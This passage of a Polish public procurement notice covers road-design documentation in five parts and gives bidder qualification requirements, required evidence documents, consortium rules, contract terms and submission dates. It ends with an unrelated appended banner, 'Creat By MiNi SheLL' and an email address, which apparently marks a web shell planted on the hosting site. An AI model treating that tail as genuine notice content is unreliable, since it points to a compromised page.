upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 dokumentacje, odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. <br/>Przez „zadanie odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia należy rozumieć wykonanie projektów budowy, przebudowy, rozbudowy dróg.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Zamawiający uzna warunek dotyczący zdolności technicznej lub zawodowej za spełniony, gdy jeden z Wykonawców wykaże się realizacją dwóch wymaganych przez Zamawiającego umów. Zamawiający nie dopuszcza sumowania zdolności technicznej lub zawodowej, tzn. warunek nie zostanie uznany za spełniony w sytuacji, gdy Wykonawcy wspólnie ubiegający się o zamówienie wykażą, że zrealizowali w sumie dwie umowy, ale żaden z nich nie zrealizował samodzielnie dwóch umów wymaganych przez Zamawiającego.<br/>W przypadku, gdy Wykonawca polegający na zdolnościach lub sytuacji innych podmiotów w zakresie zdolności technicznej lub zawodowej, Zamawiający uzna warunek dotyczący zdolności technicznej lub zawodowej za spełniony, gdy podmiot udostępniający zdolność techniczną lub zawodową zrealizował samodzielnie dwie umowy wymagane przez Zamawiającego.<br/>W przypadku, gdy złożone przez Wykonawcę dokumenty w celu potwierdzenia spełniania warunku udziału w postępowaniu zawierają dane w innych walutach niż w złotych polskich, Zamawiający w celu oceny spełnienia warunku udziału w postępowaniu wartości wykonanych zamówień w innej walucie niż złoty polski przeliczy je na podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich walut obcych Narodowego Banku Polskiego (http://www.nbp.pl) na dzień publikacji ogłoszenia o zamówieniu. Jeżeli w tym dniu nie będzie opublikowana tabela kursów średnich walut obcych Narodowego Banku Polskiego, Zamawiający przyjmie kurs średni z ostatniej tabeli przed dniem publikacji ogłoszenia o zamówieniu.<br/>2.2) Kadra techniczna:<br/>2.2.1) Dla części 1, 2, 3, 4 i 5 – będzie dysponował w okresie realizacji zamówienia osobami o odpowiednich kwalifikacjach zawodowych niezbędnych do wykonania zamówienia:<br/>Koordynator projektu (projektant) – osoba posiadająca uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie do projektowania bez ograniczeń w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane ww. specjalności umożliwiające zrealizowanie przedmiotowego zamówienia,<br/>3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności <br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;<br/>b)	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 1-4) i 6) ustawy, art. 109 ust. 1 pkt 5 i 7-10 ustawy – załącznik nr 7 do SWZ;<br/>c)	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 109 ust. 1 pkt. 4 ustawy, wy-stawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; (W przypadku składania oferty przez wykonawców występujących wspólnie ww. dokument przedstawia każdy wykonawca we własnym imieniu).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez pod-miot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy – załącznik nr 5 do SWZ;<br/>b)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 5A do SWZ;<br/>c)	Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień – załącznik nr 5B do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) pełnomocnictwo:<br/>a) jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o<br/>których mowa w pkt 5) (np. KRS, CEIDG), wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien<br/>dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia<br/>oferty i podpisania umowy,<br/>b) zapis pkt 1 lit. a stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się (np.<br/>Konsorcjum) o udzielenie zamówienia publicznego,<br/>c) w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania<br/>w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być<br/>załączone do oferty i powinno zawierać w szczególności wskazanie: - postępowania o zamówienie publiczne, którego<br/>dotyczy, - wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z<br/>określeniem adresu siedziby, ustanowionego pełnomocnika oraz zakresu jego umocowania;<br/>2) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługę, do realizacji której te<br/>zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni wykonawcy.<br/>3) jeżeli wykonawca, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby - zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia<br/>(załącznik nr 6 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że stosunek łączący wykonawcę z<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów;<br/>4) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu przez podmiot<br/>udostępniający zasoby, jeżeli Wykonawca polega na zasobach podmiotu trzeciego – załącznik nr 2a;<br/>5) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania:<br/>a) wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 5, jeżeli zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale XI pkt 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art.<br/>454-455 ustawy pzp oraz wskazanym we wzorze umowy, stanowiącym załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://susz.logintrade.net/zapytania_email,209972,30acbc6ff8034551580d1d73d9b3958c.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-29 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com